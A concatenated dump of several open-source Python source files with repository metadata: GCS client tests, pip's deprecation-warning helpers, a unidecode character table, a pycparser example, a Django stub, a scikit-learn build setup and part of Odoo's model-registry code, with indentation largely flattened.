self.assertFalse(self.client.isdir(bucket_url('exists_test')))
def test_mkdir(self):
self.client.mkdir(bucket_url('exists_dir_test'))
self.assertTrue(self.client.exists(bucket_url('exists_dir_test')))
self.assertTrue(self.client.isdir(bucket_url('exists_dir_test')))
def test_mkdir_by_upload(self):
self.client.put_string('hello', bucket_url('test_dir_recursive/yep/file'))
self.assertTrue(self.client.exists(bucket_url('test_dir_recursive')))
self.assertTrue(self.client.isdir(bucket_url('test_dir_recursive')))
def test_download(self):
self.client.put_string('hello', bucket_url('test_download'))
fp = self.client.download(bucket_url('test_download'))
self.assertEqual(b'hello', fp.read())
def test_rename(self):
self.client.put_string('hello', bucket_url('test_rename_1'))
self.client.rename(bucket_url('test_rename_1'), bucket_url('test_rename_2'))
self.assertFalse(self.client.exists(bucket_url('test_rename_1')))
self.assertTrue(self.client.exists(bucket_url('test_rename_2')))
def test_rename_recursive(self):
self.client.mkdir(bucket_url('test_rename_recursive'))
self.client.put_string('hello', bucket_url('test_rename_recursive/1'))
self.client.put_string('hello', bucket_url('test_rename_recursive/2'))
self.client.rename(bucket_url('test_rename_recursive'), bucket_url('test_rename_recursive_dest'))
self.assertFalse(self.client.exists(bucket_url('test_rename_recursive')))
self.assertFalse(self.client.exists(bucket_url('test_rename_recursive/1')))
self.assertTrue(self.client.exists(bucket_url('test_rename_recursive_dest')))
self.assertTrue(self.client.exists(bucket_url('test_rename_recursive_dest/1')))
def test_remove(self):
self.client.put_string('hello', bucket_url('test_remove'))
self.client.remove(bucket_url('test_remove'))
self.assertFalse(self.client.exists(bucket_url('test_remove')))
def test_remove_recursive(self):
self.client.mkdir(bucket_url('test_remove_recursive'))
self.client.put_string('hello', bucket_url('test_remove_recursive/1'))
self.client.put_string('hello', bucket_url('test_remove_recursive/2'))
self.client.remove(bucket_url('test_remove_recursive'))
self.assertFalse(self.client.exists(bucket_url('test_remove_recursive')))
self.assertFalse(self.client.exists(bucket_url('test_remove_recursive/1')))
self.assertFalse(self.client.exists(bucket_url('test_remove_recursive/2')))
def test_listdir(self):
self.client.put_string('hello', bucket_url('test_listdir/1'))
self.client.put_string('hello', bucket_url('test_listdir/2'))
self.assertEqual([bucket_url('test_listdir/1'), bucket_url('test_listdir/2')],
list(self.client.listdir(bucket_url('test_listdir/'))))
self.assertEqual([bucket_url('test_listdir/1'), bucket_url('test_listdir/2')],
list(self.client.listdir(bucket_url('test_listdir'))))
def test_put_file(self):
with tempfile.NamedTemporaryFile() as fp:
            lorem = b'Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt\n'
# Larger file than chunk size, fails with incorrect progress set up
big = lorem * 41943
fp.write(big)
fp.flush()
self.client.put(fp.name, bucket_url('test_put_file'))
self.assertTrue(self.client.exists(bucket_url('test_put_file')))
self.assertEqual(big, self.client.download(bucket_url('test_put_file')).read())
def test_put_file_multiproc(self):
temporary_fps = []
for _ in range(2):
fp = tempfile.NamedTemporaryFile(mode='wb')
lorem = b'Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt\n'
# Larger file than chunk size, fails with incorrect progress set up
big = lorem * 41943
fp.write(big)
fp.flush()
temporary_fps.append(fp)
filepaths = [f.name for f in temporary_fps]
self.client.put_multiple(filepaths, bucket_url(''), num_process=2)
for fp in temporary_fps:
basename = os.path.basename(fp.name)
self.assertTrue(self.client.exists(bucket_url(basename)))
self.assertEqual(big, self.client.download(bucket_url(basename)).read())
fp.close()
@attr('gcloud')
class GCSTargetTest(_GCSBaseTestCase, FileSystemTargetTestMixin):
def create_target(self, format=None):
return gcs.GCSTarget(bucket_url(self.id()), format=format, client=self.client)
def test_close_twice(self):
# Ensure gcs._DeleteOnCloseFile().close() can be called multiple times
tgt = self.create_target()
with tgt.open('w') as dst:
dst.write('data')
assert dst.closed
dst.close()
assert dst.closed
with tgt.open() as src:
assert src.read().strip() == 'data'
assert src.closed
src.close()
assert src.closed
|
talhajaved/nyuadmarket
|
refs/heads/master
|
flask/lib/python2.7/site-packages/pip/utils/deprecation.py
|
122
|
"""
A module that implements tooling to enable easy warnings about deprecations.
"""
from __future__ import absolute_import
import logging
import warnings
class PipDeprecationWarning(Warning):
pass
class RemovedInPip7Warning(PipDeprecationWarning, DeprecationWarning):
pass
class RemovedInPip8Warning(PipDeprecationWarning, PendingDeprecationWarning):
pass
DEPRECATIONS = [RemovedInPip7Warning, RemovedInPip8Warning]
# Warnings <-> Logging Integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(
message, category, filename, lineno, file, line,
)
else:
if issubclass(category, PipDeprecationWarning):
# We use a specially named logger which will handle all of the
# deprecation messages for pip.
logger = logging.getLogger("pip.deprecations")
# This is purposely using the % formatter here instead of letting
# the logging module handle the interpolation. This is because we
# want it to appear as if someone typed this entire message out.
log_message = "DEPRECATION: %s" % message
# Things that are DeprecationWarnings will be removed in the very
# next version of pip. We want these to be more obvious so we
            # use the ERROR logging level, while the PendingDeprecationWarnings
            # still have at least 2 versions to go until they are removed,
            # so they can just be warnings.
if issubclass(category, DeprecationWarning):
logger.error(log_message)
else:
logger.warning(log_message)
else:
_warnings_showwarning(
message, category, filename, lineno, file, line,
)
def install_warning_logger():
global _warnings_showwarning
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
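# Sketch of intended use (illustrative): install the logger hook once at
# startup, then route deprecations through the standard warnings machinery:
#
#   install_warning_logger()
#   warnings.warn("--foo is deprecated", RemovedInPip8Warning)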
|
chirilo/mozillians
|
refs/heads/master
|
vendor-local/lib/python/unidecode/x08e.py
|
252
|
data = (
'Chu ', # 0x00
'Jing ', # 0x01
'Nie ', # 0x02
'Xiao ', # 0x03
'Bo ', # 0x04
'Chi ', # 0x05
'Qun ', # 0x06
'Mou ', # 0x07
'Shu ', # 0x08
'Lang ', # 0x09
'Yong ', # 0x0a
'Jiao ', # 0x0b
'Chou ', # 0x0c
'Qiao ', # 0x0d
'[?] ', # 0x0e
'Ta ', # 0x0f
'Jian ', # 0x10
'Qi ', # 0x11
'Wo ', # 0x12
'Wei ', # 0x13
'Zhuo ', # 0x14
'Jie ', # 0x15
'Ji ', # 0x16
'Nie ', # 0x17
'Ju ', # 0x18
'Ju ', # 0x19
'Lun ', # 0x1a
'Lu ', # 0x1b
'Leng ', # 0x1c
'Huai ', # 0x1d
'Ju ', # 0x1e
'Chi ', # 0x1f
'Wan ', # 0x20
'Quan ', # 0x21
'Ti ', # 0x22
'Bo ', # 0x23
'Zu ', # 0x24
'Qie ', # 0x25
'Ji ', # 0x26
'Cu ', # 0x27
'Zong ', # 0x28
'Cai ', # 0x29
'Zong ', # 0x2a
'Peng ', # 0x2b
'Zhi ', # 0x2c
'Zheng ', # 0x2d
'Dian ', # 0x2e
'Zhi ', # 0x2f
'Yu ', # 0x30
'Duo ', # 0x31
'Dun ', # 0x32
'Chun ', # 0x33
'Yong ', # 0x34
'Zhong ', # 0x35
'Di ', # 0x36
'Zhe ', # 0x37
'Chen ', # 0x38
'Chuai ', # 0x39
'Jian ', # 0x3a
'Gua ', # 0x3b
'Tang ', # 0x3c
'Ju ', # 0x3d
'Fu ', # 0x3e
'Zu ', # 0x3f
'Die ', # 0x40
'Pian ', # 0x41
'Rou ', # 0x42
'Nuo ', # 0x43
'Ti ', # 0x44
'Cha ', # 0x45
'Tui ', # 0x46
'Jian ', # 0x47
'Dao ', # 0x48
'Cuo ', # 0x49
'Xi ', # 0x4a
'Ta ', # 0x4b
'Qiang ', # 0x4c
'Zhan ', # 0x4d
'Dian ', # 0x4e
'Ti ', # 0x4f
'Ji ', # 0x50
'Nie ', # 0x51
'Man ', # 0x52
'Liu ', # 0x53
'Zhan ', # 0x54
'Bi ', # 0x55
'Chong ', # 0x56
'Lu ', # 0x57
'Liao ', # 0x58
'Cu ', # 0x59
'Tang ', # 0x5a
'Dai ', # 0x5b
'Suo ', # 0x5c
'Xi ', # 0x5d
'Kui ', # 0x5e
'Ji ', # 0x5f
'Zhi ', # 0x60
'Qiang ', # 0x61
'Di ', # 0x62
'Man ', # 0x63
'Zong ', # 0x64
'Lian ', # 0x65
'Beng ', # 0x66
'Zao ', # 0x67
'Nian ', # 0x68
'Bie ', # 0x69
'Tui ', # 0x6a
'Ju ', # 0x6b
'Deng ', # 0x6c
'Ceng ', # 0x6d
'Xian ', # 0x6e
'Fan ', # 0x6f
'Chu ', # 0x70
'Zhong ', # 0x71
'Dun ', # 0x72
'Bo ', # 0x73
'Cu ', # 0x74
'Zu ', # 0x75
'Jue ', # 0x76
'Jue ', # 0x77
'Lin ', # 0x78
'Ta ', # 0x79
'Qiao ', # 0x7a
'Qiao ', # 0x7b
'Pu ', # 0x7c
'Liao ', # 0x7d
'Dun ', # 0x7e
'Cuan ', # 0x7f
'Kuang ', # 0x80
'Zao ', # 0x81
'Ta ', # 0x82
'Bi ', # 0x83
'Bi ', # 0x84
'Zhu ', # 0x85
'Ju ', # 0x86
'Chu ', # 0x87
'Qiao ', # 0x88
'Dun ', # 0x89
'Chou ', # 0x8a
'Ji ', # 0x8b
'Wu ', # 0x8c
'Yue ', # 0x8d
'Nian ', # 0x8e
'Lin ', # 0x8f
'Lie ', # 0x90
'Zhi ', # 0x91
'Li ', # 0x92
'Zhi ', # 0x93
'Chan ', # 0x94
'Chu ', # 0x95
'Duan ', # 0x96
'Wei ', # 0x97
'Long ', # 0x98
'Lin ', # 0x99
'Xian ', # 0x9a
'Wei ', # 0x9b
'Zuan ', # 0x9c
'Lan ', # 0x9d
'Xie ', # 0x9e
'Rang ', # 0x9f
'Xie ', # 0xa0
'Nie ', # 0xa1
'Ta ', # 0xa2
'Qu ', # 0xa3
'Jie ', # 0xa4
'Cuan ', # 0xa5
'Zuan ', # 0xa6
'Xi ', # 0xa7
'Kui ', # 0xa8
'Jue ', # 0xa9
'Lin ', # 0xaa
'Shen ', # 0xab
'Gong ', # 0xac
'Dan ', # 0xad
'Segare ', # 0xae
'Qu ', # 0xaf
'Ti ', # 0xb0
'Duo ', # 0xb1
'Duo ', # 0xb2
'Gong ', # 0xb3
'Lang ', # 0xb4
'Nerau ', # 0xb5
'Luo ', # 0xb6
'Ai ', # 0xb7
'Ji ', # 0xb8
'Ju ', # 0xb9
'Tang ', # 0xba
'Utsuke ', # 0xbb
'[?] ', # 0xbc
'Yan ', # 0xbd
'Shitsuke ', # 0xbe
'Kang ', # 0xbf
'Qu ', # 0xc0
'Lou ', # 0xc1
'Lao ', # 0xc2
'Tuo ', # 0xc3
'Zhi ', # 0xc4
'Yagate ', # 0xc5
'Ti ', # 0xc6
'Dao ', # 0xc7
'Yagate ', # 0xc8
'Yu ', # 0xc9
'Che ', # 0xca
'Ya ', # 0xcb
'Gui ', # 0xcc
'Jun ', # 0xcd
'Wei ', # 0xce
'Yue ', # 0xcf
'Xin ', # 0xd0
'Di ', # 0xd1
'Xuan ', # 0xd2
'Fan ', # 0xd3
'Ren ', # 0xd4
'Shan ', # 0xd5
'Qiang ', # 0xd6
'Shu ', # 0xd7
'Tun ', # 0xd8
'Chen ', # 0xd9
'Dai ', # 0xda
'E ', # 0xdb
'Na ', # 0xdc
'Qi ', # 0xdd
'Mao ', # 0xde
'Ruan ', # 0xdf
'Ren ', # 0xe0
'Fan ', # 0xe1
'Zhuan ', # 0xe2
'Hong ', # 0xe3
'Hu ', # 0xe4
'Qu ', # 0xe5
'Huang ', # 0xe6
'Di ', # 0xe7
'Ling ', # 0xe8
'Dai ', # 0xe9
'Ao ', # 0xea
'Zhen ', # 0xeb
'Fan ', # 0xec
'Kuang ', # 0xed
'Ang ', # 0xee
'Peng ', # 0xef
'Bei ', # 0xf0
'Gu ', # 0xf1
'Ku ', # 0xf2
'Pao ', # 0xf3
'Zhu ', # 0xf4
'Rong ', # 0xf5
'E ', # 0xf6
'Ba ', # 0xf7
'Zhou ', # 0xf8
'Zhi ', # 0xf9
'Yao ', # 0xfa
'Ke ', # 0xfb
'Yi ', # 0xfc
'Qing ', # 0xfd
'Shi ', # 0xfe
'Ping ', # 0xff
)
|
jayceyxc/hue
|
refs/heads/master
|
desktop/core/ext-py/pycparser-2.14/examples/c-to-c.py
|
19
|
#------------------------------------------------------------------------------
# pycparser: c-to-c.py
#
# Example of using pycparser.c_generator, serving as a simplistic translator
# from C to AST and back to C.
#
# Copyright (C) 2008-2015, Eli Bendersky
# License: BSD
#------------------------------------------------------------------------------
from __future__ import print_function
import sys
# This is not required if you've installed pycparser into
# your site-packages/ with setup.py
#
sys.path.extend(['.', '..'])
from pycparser import parse_file, c_parser, c_generator
def translate_to_c(filename):
""" Simply use the c_generator module to emit a parsed AST.
"""
ast = parse_file(filename, use_cpp=True)
generator = c_generator.CGenerator()
print(generator.visit(ast))
def _zz_test_translate():
# internal use
src = r'''
void f(char * restrict joe){}
int main(void)
{
unsigned int long k = 4;
int p = - - k;
return 0;
}
'''
parser = c_parser.CParser()
ast = parser.parse(src)
ast.show()
generator = c_generator.CGenerator()
print(generator.visit(ast))
# tracing the generator for debugging
#~ import trace
#~ tr = trace.Trace(countcallers=1)
#~ tr.runfunc(generator.visit, ast)
#~ tr.results().write_results()
#------------------------------------------------------------------------------
if __name__ == "__main__":
#_zz_test_translate()
if len(sys.argv) > 1:
translate_to_c(sys.argv[1])
else:
print("Please provide a filename as argument")
|
shuggiefisher/crowdstock
|
refs/heads/master
|
django/conf/app_template/views.py
|
6027
|
# Create your views here.
|
Sklearn-HMM/scikit-learn-HMM
|
refs/heads/master
|
sklean-hmm/svm/setup.py
|
8
|
from os.path import join
import numpy
import warnings
def configuration(parent_package='', top_path=None):
from numpy.distutils.misc_util import Configuration
from numpy.distutils.system_info import get_info, BlasNotFoundError
config = Configuration('svm', parent_package, top_path)
config.add_subpackage('tests')
# Section LibSVM
# we compile both libsvm and libsvm_sparse
config.add_library('libsvm-skl',
sources=[join('src', 'libsvm', 'libsvm_template.cpp')],
depends=[join('src', 'libsvm', 'svm.cpp'),
join('src', 'libsvm', 'svm.h')],
# Force C++ linking in case gcc is picked up instead
# of g++ under windows with some versions of MinGW
extra_link_args=['-lstdc++'],
)
libsvm_sources = ['libsvm.c']
libsvm_depends = [join('src', 'libsvm', 'libsvm_helper.c'),
join('src', 'libsvm', 'libsvm_template.cpp'),
join('src', 'libsvm', 'svm.cpp'),
join('src', 'libsvm', 'svm.h')]
config.add_extension('libsvm',
sources=libsvm_sources,
include_dirs=[numpy.get_include(),
join('src', 'libsvm')],
libraries=['libsvm-skl'],
depends=libsvm_depends,
)
### liblinear module
blas_sources = [join('src', 'blas', 'daxpy.c'),
join('src', 'blas', 'ddot.c'),
join('src', 'blas', 'dnrm2.c'),
join('src', 'blas', 'dscal.c')]
liblinear_sources = ['liblinear.c',
join('src', 'liblinear', '*.cpp')]
liblinear_depends = [join('src', 'liblinear', '*.h'),
join('src', 'liblinear', 'liblinear_helper.c')]
# we try to link against system-wide blas
blas_info = get_info('blas_opt', 0)
if not blas_info:
config.add_library('blas', blas_sources)
warnings.warn(BlasNotFoundError.__doc__)
config.add_extension('liblinear',
sources=liblinear_sources,
libraries=blas_info.pop('libraries', ['blas']),
include_dirs=['src',
numpy.get_include(),
blas_info.pop('include_dirs', [])],
depends=liblinear_depends,
# extra_compile_args=['-O0 -fno-inline'],
** blas_info)
## end liblinear module
# this should go *after* libsvm-skl
libsvm_sparse_sources = ['libsvm_sparse.c']
config.add_extension('libsvm_sparse', libraries=['libsvm-skl'],
sources=libsvm_sparse_sources,
include_dirs=[numpy.get_include(),
join("src", "libsvm")],
depends=[join("src", "libsvm", "svm.h"),
join("src", "libsvm",
"libsvm_sparse_helper.c")])
return config
if __name__ == '__main__':
from numpy.distutils.core import setup
setup(**configuration(top_path='').todict())
|
galtys/odoo
|
refs/heads/8.0
|
openerp/addons/base/ir/ir_model.py
|
30
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2014 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from collections import defaultdict
import logging
import re
import time
import types
import openerp
from openerp import SUPERUSER_ID
from openerp import models, tools, api
from openerp.modules.registry import RegistryManager
from openerp.osv import fields, osv
from openerp.osv.orm import BaseModel, Model, MAGIC_COLUMNS, except_orm
from openerp.tools import config
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
MODULE_UNINSTALL_FLAG = '_force_unlink'
def _get_fields_type(self, cr, uid, context=None):
# Avoid too many nested `if`s below, as RedHat's Python 2.6
    # breaks on it. See bug 939653.
return sorted([(k,k) for k,v in fields.__dict__.iteritems()
if type(v) == types.TypeType and \
issubclass(v, fields._column) and \
v != fields._column and \
not v._deprecated and \
not issubclass(v, fields.function)])
def _in_modules(self, cr, uid, ids, field_name, arg, context=None):
#pseudo-method used by fields.function in ir.model/ir.model.fields
module_pool = self.pool["ir.module.module"]
installed_module_ids = module_pool.search(cr, uid, [('state','=','installed')])
installed_module_names = module_pool.read(cr, uid, installed_module_ids, ['name'], context=context)
installed_modules = set(x['name'] for x in installed_module_names)
result = {}
xml_ids = osv.osv._get_xml_ids(self, cr, uid, ids)
for k,v in xml_ids.iteritems():
result[k] = ', '.join(sorted(installed_modules & set(xml_id.split('.')[0] for xml_id in v)))
return result
class unknown(models.AbstractModel):
"""
Abstract model used as a substitute for relational fields with an unknown
comodel.
"""
_name = '_unknown'
class ir_model(osv.osv):
_name = 'ir.model'
_description = "Models"
_order = 'model'
def _is_osv_memory(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids, context=context)
res = dict.fromkeys(ids)
for model in models:
if model.model in self.pool:
res[model.id] = self.pool[model.model].is_transient()
else:
_logger.error('Missing model %s' % (model.model, ))
return res
def _search_osv_memory(self, cr, uid, model, name, domain, context=None):
if not domain:
return []
__, operator, value = domain[0]
if operator not in ['=', '!=']:
raise osv.except_osv(_("Invalid Search Criteria"), _('The osv_memory field can only be compared with = and != operator.'))
value = bool(value) if operator == '=' else not bool(value)
all_model_ids = self.search(cr, uid, [], context=context)
is_osv_mem = self._is_osv_memory(cr, uid, all_model_ids, 'osv_memory', arg=None, context=context)
return [('id', 'in', [id for id in is_osv_mem if bool(is_osv_mem[id]) == value])]
def _view_ids(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids)
res = {}
for model in models:
res[model.id] = self.pool["ir.ui.view"].search(cr, uid, [('model', '=', model.model)])
return res
def _inherited_models(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for model in self.browse(cr, uid, ids, context=context):
res[model.id] = []
inherited_models = [model_name for model_name in self.pool[model.model]._inherits]
if inherited_models:
res[model.id] = self.search(cr, uid, [('model', 'in', inherited_models)], context=context)
return res
_columns = {
'name': fields.char('Model Description', translate=True, required=True),
'model': fields.char('Model', required=True, select=1),
'info': fields.text('Information'),
'field_id': fields.one2many('ir.model.fields', 'model_id', 'Fields', required=True, copy=True),
'inherited_model_ids': fields.function(_inherited_models, type="many2many", obj="ir.model", string="Inherited models",
help="The list of models that extends the current model."),
'state': fields.selection([('manual','Custom Object'),('base','Base Object')],'Type', readonly=True),
'access_ids': fields.one2many('ir.model.access', 'model_id', 'Access'),
'osv_memory': fields.function(_is_osv_memory, string='Transient Model', type='boolean',
fnct_search=_search_osv_memory,
help="This field specifies whether the model is transient or not (i.e. if records are automatically deleted from the database or not)"),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the object is defined or inherited'),
'view_ids': fields.function(_view_ids, type='one2many', obj='ir.ui.view', string='Views'),
}
_defaults = {
'model': 'x_',
'state': 'manual',
}
def _check_model_name(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context=context):
if model.state=='manual':
if not model.model.startswith('x_'):
return False
if not re.match('^[a-z_A-Z0-9.]+$',model.model):
return False
return True
def _model_name_msg(self, cr, uid, ids, context=None):
return _('The Object name must start with x_ and not contain any special character !')
_constraints = [
(_check_model_name, _model_name_msg, ['model']),
]
_sql_constraints = [
('obj_name_uniq', 'unique (model)', 'Each model must be unique!'),
]
# overridden to allow searching both on model name (model field)
# and model description (name field)
def _name_search(self, cr, uid, name='', args=None, operator='ilike', context=None, limit=100, name_get_uid=None):
if args is None:
args = []
domain = args + ['|', ('model', operator, name), ('name', operator, name)]
return self.name_get(cr, name_get_uid or uid,
super(ir_model, self).search(cr, uid, domain, limit=limit, context=context),
context=context)
def _drop_table(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context):
model_pool = self.pool[model.model]
cr.execute('select relkind from pg_class where relname=%s', (model_pool._table,))
result = cr.fetchone()
if result and result[0] == 'v':
cr.execute('DROP view %s' % (model_pool._table,))
elif result and result[0] == 'r':
cr.execute('DROP TABLE %s CASCADE' % (model_pool._table,))
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module tables
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG):
for model in self.browse(cr, user, ids, context):
if model.state != 'manual':
raise except_orm(_('Error'), _("Model '%s' contains module data and cannot be removed!") % (model.name,))
self._drop_table(cr, user, ids, context)
res = super(ir_model, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
# only reload pool for normal unlink. For module uninstall the
# reload is done independently in openerp.modules.loading
cr.commit() # must be committed before reloading registry in new cursor
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context:
context = dict(context)
context.pop('__last_update', None)
# Filter out operations 4 link from field id, because openerp-web
# always write (4,id,False) even for non dirty items
if 'field_id' in vals:
vals['field_id'] = [op for op in vals['field_id'] if op[0] != 4]
return super(ir_model,self).write(cr, user, ids, vals, context)
def create(self, cr, user, vals, context=None):
if context is None:
context = {}
res = super(ir_model,self).create(cr, user, vals, context)
if vals.get('state','manual')=='manual':
# add model in registry
self.instanciate(cr, user, vals['model'], context)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def instanciate(self, cr, user, model, context=None):
if isinstance(model, unicode):
model = model.encode('utf-8')
class CustomModel(models.Model):
_name = model
_module = False
_custom = True
CustomModel._build_model(self.pool, cr)
class ir_model_fields(osv.osv):
_name = 'ir.model.fields'
_description = "Fields"
_rec_name = 'field_description'
_columns = {
'name': fields.char('Name', required=True, select=1),
'complete_name': fields.char('Complete Name', select=1),
'model': fields.char('Object Name', required=True, select=1,
help="The technical name of the model this field belongs to"),
'relation': fields.char('Object Relation',
help="For relationship fields, the technical name of the target model"),
'relation_field': fields.char('Relation Field',
help="For one2many fields, the field on the target model that implement the opposite many2one relationship"),
'model_id': fields.many2one('ir.model', 'Model', required=True, select=True, ondelete='cascade',
help="The model this field belongs to"),
'field_description': fields.char('Field Label', required=True),
'ttype': fields.selection(_get_fields_type, 'Field Type', required=True),
'selection': fields.char('Selection Options', help="List of options for a selection field, "
"specified as a Python expression defining a list of (key, label) pairs. "
"For example: [('blue','Blue'),('yellow','Yellow')]"),
'required': fields.boolean('Required'),
'readonly': fields.boolean('Readonly'),
'select_level': fields.selection([('0','Not Searchable'),('1','Always Searchable'),('2','Advanced Search (deprecated)')],'Searchable', required=True),
'translate': fields.boolean('Translatable', help="Whether values for this field can be translated (enables the translation mechanism for that field)"),
'size': fields.integer('Size'),
'state': fields.selection([('manual','Custom Field'),('base','Base Field')],'Type', required=True, readonly=True, select=1),
'on_delete': fields.selection([('cascade', 'Cascade'), ('set null', 'Set NULL'), ('restrict', 'Restrict')],
'On Delete', help='On delete property for many2one fields'),
'domain': fields.char('Domain', help="The optional domain to restrict possible values for relationship fields, "
"specified as a Python expression defining a list of triplets. "
"For example: [('color','=','red')]"),
'groups': fields.many2many('res.groups', 'ir_model_fields_group_rel', 'field_id', 'group_id', 'Groups'),
'selectable': fields.boolean('Selectable'),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the field is defined'),
'serialization_field_id': fields.many2one('ir.model.fields', 'Serialization Field', domain = "[('ttype','=','serialized')]",
ondelete='cascade', help="If set, this field will be stored in the sparse "
"structure of the serialization field, instead "
"of having its own database column. This cannot be "
"changed after creation."),
}
_rec_name='field_description'
_defaults = {
'selection': "",
'domain': "[]",
'name': 'x_',
'state': 'manual',
'on_delete': 'set null',
'select_level': '0',
'field_description': '',
'selectable': 1,
}
_order = "name"
def _check_selection(self, cr, uid, selection, context=None):
try:
selection_list = eval(selection)
except Exception:
_logger.warning('Invalid selection list definition for fields.selection', exc_info=True)
raise except_orm(_('Error'),
_("The Selection Options expression is not a valid Pythonic expression."
"Please provide an expression in the [('key','Label'), ...] format."))
check = True
if not (isinstance(selection_list, list) and selection_list):
check = False
else:
for item in selection_list:
if not (isinstance(item, (tuple,list)) and len(item) == 2):
check = False
break
if not check:
raise except_orm(_('Error'),
_("The Selection Options expression is must be in the [('key','Label'), ...] format!"))
return True
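    # Illustrative sketch (not part of the original source): _check_selection
    # accepts a string containing a Python literal list of 2-tuples, e.g.
    #   "[('draft','Draft'), ('done','Done')]"
    # whereas "['draft','done']" or "[('draft',)]" would raise except_orm,
    # since every item must be a (key, label) pair.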
def _size_gt_zero_msg(self, cr, user, ids, context=None):
        return _('Size of the field can never be less than 0!')
_sql_constraints = [
('size_gt_zero', 'CHECK (size>=0)',_size_gt_zero_msg ),
]
def _drop_column(self, cr, uid, ids, context=None):
for field in self.browse(cr, uid, ids, context):
if field.name in MAGIC_COLUMNS:
continue
model = self.pool[field.model]
cr.execute('select relkind from pg_class where relname=%s', (model._table,))
result = cr.fetchone()
cr.execute("SELECT column_name FROM information_schema.columns WHERE table_name ='%s' and column_name='%s'" %(model._table, field.name))
column_name = cr.fetchone()
if column_name and (result and result[0] == 'r'):
cr.execute('ALTER table "%s" DROP column "%s" cascade' % (model._table, field.name))
# remove m2m relation table for custom fields
# we consider the m2m relation is only one way as it's not possible
# to specify the relation table in the interface for custom fields
# TODO master: maybe use ir.model.relations for custom fields
if field.state == 'manual' and field.ttype == 'many2many':
rel_name = model._fields[field.name].relation
cr.execute('DROP table "%s"' % (rel_name))
model._pop_field(field.name)
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module columns
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG) and \
any(field.state != 'manual' for field in self.browse(cr, user, ids, context)):
raise except_orm(_('Error'), _("This column contains module data and cannot be removed!"))
self._drop_column(cr, user, ids, context)
res = super(ir_model_fields, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
            # The field we just deleted might have been inherited, and the
            # registry is inconsistent in this case; therefore we reload it.
cr.commit()
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def create(self, cr, user, vals, context=None):
if 'model_id' in vals:
model_data = self.pool['ir.model'].browse(cr, user, vals['model_id'])
vals['model'] = model_data.model
if context is None:
context = {}
if vals.get('ttype', False) == 'selection':
if not vals.get('selection',False):
raise except_orm(_('Error'), _('For selection fields, the Selection Options must be given!'))
self._check_selection(cr, user, vals['selection'], context=context)
res = super(ir_model_fields,self).create(cr, user, vals, context)
if vals.get('state','manual') == 'manual':
if not vals['name'].startswith('x_'):
raise except_orm(_('Error'), _("Custom fields must have a name that starts with 'x_' !"))
if vals.get('relation',False) and not self.pool['ir.model'].search(cr, user, [('model','=',vals['relation'])]):
raise except_orm(_('Error'), _("Model %s does not exist!") % vals['relation'])
self.pool.clear_manual_fields()
if vals['model'] in self.pool:
model = self.pool[vals['model']]
if vals['model'].startswith('x_') and vals['name'] == 'x_name':
model._rec_name = 'x_name'
# re-initialize model in registry
model.__init__(self.pool, cr)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context is None:
context = {}
#For the moment renaming a sparse field or changing the storing system is not allowed. This may be done later
if 'serialization_field_id' in vals or 'name' in vals:
for field in self.browse(cr, user, ids, context=context):
if 'serialization_field_id' in vals and field.serialization_field_id.id != vals['serialization_field_id']:
raise except_orm(_('Error!'), _('Changing the storing system for field "%s" is not allowed.')%field.name)
if field.serialization_field_id and (field.name != vals['name']):
raise except_orm(_('Error!'), _('Renaming sparse field "%s" is not allowed')%field.name)
# if set, *one* column can be renamed here
column_rename = None
# names of the models to patch
patched_models = set()
if vals and ids:
checked_selection = False # need only check it once, so defer
for item in self.browse(cr, user, ids, context=context):
obj = self.pool.get(item.model)
field = getattr(obj, '_fields', {}).get(item.name)
if item.state != 'manual':
raise except_orm(_('Error!'),
